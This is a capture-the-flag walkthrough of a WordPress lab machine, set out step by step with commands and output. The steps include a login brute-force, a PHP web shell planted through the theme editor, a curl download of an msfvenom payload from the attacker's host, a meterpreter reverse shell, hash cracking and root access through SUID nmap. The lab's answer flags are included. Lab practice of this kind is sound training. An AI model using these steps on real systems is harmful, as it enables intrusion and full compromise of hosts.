[Hack the machine]

[*] Target: 10.10.78.221

[Question 1] What is key 1? => 073403c8a58a1f80d943455fb30724b9

    >> nmap -A -v --script=http-enum 10.10.78.221
    
        22/tcp  closed ssh
        80/tcp  open   http     Apache httpd
        |_http-csrf: Couldn't find any CSRF vulnerabilities.
        |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
        |_http-dombased-xss: Couldn't find any DOM based XSS.
        | http-enum: 
        |   /admin/: Possible admin folder
        |   /admin/index.html: Possible admin folder
        |   /wp-login.php: Possible admin folder
        |   /robots.txt: Robots file
        |   /feed/: Wordpress version: 4.3.1
        |   /wp-includes/images/rss.png: Wordpress version 2.2 found.
        |   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
        |   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
        |   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
        |   /wp-login.php: Wordpress login page.
        |   /wp-admin/upgrade.php: Wordpress login page.
        |   /readme.html: Interesting, a readme.
        |   /0/: Potentially interesting folder
        |_  /image/: Potentially interesting folder
        |_http-server-header: Apache
        443/tcp open   ssl/http Apache httpd
        |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
        |_http-csrf: Couldn't find any CSRF vulnerabilities.
        |_http-dombased-xss: Couldn't find any DOM based XSS.
        | http-enum: 
        |   /admin/: Possible admin folder
        |   /admin/index.html: Possible admin folder
        |   /wp-login.php: Possible admin folder
        |   /robots.txt: Robots file
        |   /feed/: Wordpress version: 4.3.1
        |   /wp-includes/images/rss.png: Wordpress version 2.2 found.
        |   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
        |   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
        |   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
        |   /wp-login.php: Wordpress login page.
        |   /wp-admin/upgrade.php: Wordpress login page.
        |   /readme.html: Interesting, a readme.
        |   /0/: Potentially interesting folder
        |_  /image/: Potentially interesting folder
        |_http-server-header: Apache

    => Well well well! What do we have here ! A Wordpress attack I guess

    => I visited http://10.10.78.221/robots.txt and found 

        User-agent: *
        fsocity.dic
        key-1-of-3.txt

        [>>] http://10.10.78.221/key-1-of-3.txt => 073403c8a58a1f80d943455fb30724b9

[Question 2] What is key 2? => 822c73956184f694993bede3eb39f959

[Note] Do not use the wpscan in this situation
 
    [+] Okay! After visiting the /fsocity.dic, I think this is some kind of wordlist, and you know username:password is the most important thing in a wordpress attack

        [!] I also have a writeup about this kind of attack (Link: https://github.com/Forgebreaker/HTB_Bug_Bounty_Hunter/tree/main/19.%20Hacking%20WordPress)

    [>>] You can find the login page at http://10.10.78.221/wp-login.php, now we need to find a valid username

        POST /wp-login.php HTTP/1.1
        Host: 10.10.78.221
        ...

        log=§admin§&pwd=123&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.78.221%2Fwp-admin%2F&testcookie=1

    [>>] Even when the password is wrong, we still can find the valid user => Elliot

    [+] After 1 hour brute forcing, I sill can't find the correct password  

        => I performed 2 brute force attacks, one using a wordlist in top-down order and the other using bottom-up order to optimize the time 

        ...
        log=Elliot&pwd=§123§&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.78.221%2Fwp-admin%2F&testcookie=1       

        [>>] Our credential: Elliot:ER28-0652

    [+] Go to the Theme Editor >> Now, you should look for any ".php" file 
        (I myself chose http://10.10.78.221/wp-admin/theme-editor.php?file=comments.php&theme=twentythirteen&scrollto=0)

        => Change its content to "<?php system($_GET['cmd']);?>", which is a super basic web shell

        [Check] http://10.10.78.221/wp-content/themes/twentythirteen/comments.php?cmd=id => uid=1(daemon) gid=1(daemon) groups=1(daemon)
        
        [>>] Good! but I think we need a better shell, since the flag is little bit harder to find

            >>> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.14.56.1 LPORT=1234 -f raw -o shell.php
    
                [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
                [-] No arch selected, selecting arch: php from the payload
                No encoder specified, outputting raw payload
                Payload size: 1111 bytes
                Saved as: shell.php

        [>>] http://10.10.78.221/wp-content/themes/twentythirteen/comments.php?cmd=curl%20http://10.14.56.1:8000/shell.php%20-o%20shell.php

            => python3 -m http.server
                Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
                10.10.78.221 - - [14/Jul/2023 13:10:13] "GET /shell.php HTTP/1.1" 200 -

        [>>] http://10.10.78.221/wp-content/themes/twentythirteen/shell.php

            msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
            payload => php/meterpreter/reverse_tcp
            msf6 exploit(multi/handler) > set LHOST 10.14.56.1
            LHOST => 10.14.56.1
            msf6 exploit(multi/handler) > set LPORT 1234
            LPORT => 1234
            msf6 exploit(multi/handler) > run

            [*] Started reverse TCP handler on 10.14.56.1:1234 
            [*] Sending stage (39927 bytes) to 10.10.78.221
            [*] Meterpreter session 1 opened (10.14.56.1:1234 -> 10.10.78.221:51434) at 2023-07-14 13:14:42 +0800

            meterpreter > ls
            Listing: /home/robot
            ====================

            Mode              Size  Type  Last modified              Name
            ----              ----  ----  -------------              ----
            100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt
            100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5

            meterpreter > cat key-2-of-3.txt
            [-] core_channel_open: Operation failed: 1

            meterpreter > cat password.raw-md5
            robot:c3fcd3d76192e4007dfb496cca67e13b

            [!] Using https://crackstation.net/ => we know that c3fcd3d76192e4007dfb496cca67e13b <=> abcdefghijklmnopqrstuvwxyz

                meterpreter > shell
                
                Process 2289 created.
                Channel 2 created.
                
                su robot
                su: must be run from a terminal

                [>>] echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
                     
                     python /tmp/asdf.py
                     
                     daemon@linux:/home/robot$ su robot
                     Password: abcdefghijklmnopqrstuvwxyz

                     robot@linux:~$ cat key-2-of-3.txt
                     822c73956184f694993bede3eb39f959

[Question 3] What is key 3? => 04787ddef27c3dee1ee161b21670b4e4

    # After checking crontab, I can't find anything usefull, so I looking for SUID files or services:

        robot@linux:~$ find / -perm /4000 -type f 2>/dev/null
    
            /bin/ping
            /bin/umount
            /bin/mount
            /bin/ping6
            /bin/su
            /usr/bin/passwd
            /usr/bin/newgrp
            /usr/bin/chsh
            /usr/bin/chfn
            /usr/bin/gpasswd
            /usr/bin/sudo
            /usr/local/bin/nmap
            /usr/lib/openssh/ssh-keysign
            /usr/lib/eject/dmcrypt-get-device
            /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
            /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
            /usr/lib/pt_chown

    [Note] I think I saw this situation before, it was a linux privileged escalation lab in OverTheWire platform, where I interacted with nmap to read the flag

           Here is the trick: https://gtfobins.github.io/gtfobins/nmap/#suid

            robot@linux:~$ nmap --interactive
            nmap --interactive

            Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
            Welcome to Interactive Mode -- press h <enter> for help

                nmap> !sh

                # cd /root

                # ls

                    firstboot_done  key-3-of-3.txt

                # cat key-3-of-3.txt

                    04787ddef27c3dee1ee161b21670b4e4
    






